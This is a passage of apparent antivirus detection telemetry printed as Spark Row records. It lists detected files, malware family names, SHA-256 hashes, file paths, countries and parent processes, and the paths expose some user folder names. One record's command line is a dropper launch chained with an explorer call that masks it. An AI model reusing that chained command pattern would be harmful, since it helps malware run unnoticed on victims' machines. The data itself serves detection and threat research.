  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:56:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='гилязетдинова.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Гилязетдинова.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151656-8b5ff1ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7783ea80\\AVSCAN-20181102-052319-9E8D11B5\\AVSCAN-20181102-151656-8B5FF1EC', filesize=192000, name='TR/AD.Ramnit.Y.#M1.#R1'), hash='ed84e7f971503a31cda4ca63ba9600a9acdea9afbc17eba20982f773fc9cad08', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0029209a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029209a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293887', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293887', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215827-8aeca388', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215827-8AECA388', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:58:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:04:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155840-dca91e87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155449-B8C81DD8\\AVSCAN-20181104-155840-DCA91E87', filesize=332000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b969553818d7b1a9081ec2355798048f5b1410113b76a58febe22f31873c614a', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c5ee', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c5ee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:32:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:39:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0046105.scr', filepath='\\\\?\\G:\\System Volume Information\\_restore{D118A09B-90A9-4727-BFBE-3C953AC13555}\\RP31\\A0046105.scr', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='d24f70d89182f9fe3c31a8cd1bf512843cc26b0a5452d1b3137c0d97b52f18c3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:35:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184500-b1e3efb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184500-B1E3EFB9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:44:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='e1f89e255d1369348e284053014b9cd2c1b3b77e5cb6078e81e5c1849f550c87', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='cfc5d617d8ce594fafd922c04d7d9075bd5d9ecfdf8c081185b461430f682bc5', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T20:58:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5c00cae0e80ae080f77b83b4409622a5.exe', filepath='D:\\5c00cae0e80ae080f77b83b4409622a5.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R3643'), hash='ea8ca41a9a1f50a5907d9df55d913686d567a2e2444402b78e584d294c108df1', metadata=Row(cmdline='\\\\\\/c start 5c00cae0e80ae080f77b83b4409622a5.exe&explorer \\\\\\/root,\\\\\\"%CD%MARTe pdm.pptx\\\\\\" & exit', country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=232960, timestamp='2018-11-04T17:32:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150307-dba4b5f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-150307-DBA4B5F0', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:03:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[2].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[2].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194723-8716d13a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b830c03\\AVSCAN-20181101-194653-82E83AD1\\AVSCAN-20181101-194723-8716D13A', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='f60a2da65941cc9bc9c0d168daa87a47ab390e8a1ab0e19ac3ea945d8e06c8a5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004ac2', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp00004ac2', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T15:54:22Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='peb 2012.pif', filepath='D:\\DOKUMENKU\\GABUNG NOM DEPOSITO\\2012\\DEPO PEB 2012\\PEB 2012.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T01:09:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='762.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\762\\762.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:20:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ktfdrm_ucc.dll', filepath='C:\\Program Files (x86)\\Samsung\\Samsung New PC Studio\\KTFDRM_UCC.dll', filesize=512000, name='W32/Nimnul.D.#M1.#R1'), hash='0479b46fd31c057040a06223d37efe907f1440979dd465e2fbd8bed6d374e803', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T07:09:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160105-f45a2086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160105-F45A2086', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-02T08:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T11:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ebbb585a81c38fe104d0ae7180925a44cfbf342046c535f2cb8c51649c291fa', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\5EBBB585A81C38FE104D0AE7180925A44CFBF342046C535F2CB8C51649C291FA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ebbb585a81c38fe104d0ae7180925a44cfbf342046c535f2cb8c51649c291fa', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:53:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184110-e8a9b352', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5657254\\AVSCAN-20181102-184045-E440E557\\AVSCAN-20181102-184110-E8A9B352', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='430cd623c075cb0a757dd832890558020f5c17fda937bde651029c0b69144d15', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evt.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\EVT\\EVT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5ac3e3d417e155cdf1927e3f872654ae40655b0ebf8fb8901a9f01ce0fc3617f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='F:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T07:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07aa36d6c2b094ff371d1920aeae35c8fbbcb5dcb82519c3c8b88ad8c8a97282', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\07AA36D6C2B094FF371D1920AEAE35C8FBBCB5DCB82519C3C8B88AD8C8A97282', filesize=1280000, name='TR/Crypt.XPACK.Gen.#M300.#R4071'), hash='07aa36d6c2b094ff371d1920aeae35c8fbbcb5dcb82519c3c8b88ad8c8a97282', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='core.bat', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\grips_ra\\core\\core.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=36000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='677f4309e61b10586c96ec8d6db5505ed2bb91e618f2216fa461d2c269a2d1a4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T14:06:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD5725-D41B-FA55-3028-3863E6DB5FB1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='1a6ac4f7fb1d4238cbfa903d3ff204a10a763c63e97fb01aac8d47aaf99a4f2d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ea help.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\EA Help.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005909-6ea1ddb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a82ae42a\\AVSCAN-20181102-224112-BD43C1FB\\AVSCAN-20181103-005909-6EA1DDB3', filesize=2988000, name='TR/Injector.oqpvn.#M1.#R1'), hash='1925d43aef01e3b7d96cd09bdfbd05515ca4c9305685c3997990be1e72f314f1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T09:39:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4589636b9b84557dd4b31cb6feb6c11f1775f16970167f9b466e7ed7277ac65b', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\4589636B9B84557DD4B31CB6FEB6C11F1775F16970167F9B466E7ED7277AC65B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4589636b9b84557dd4b31cb6feb6c11f1775f16970167f9b466e7ed7277ac65b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:52Z'), dt=datetime.date(2018, 11, 2)),
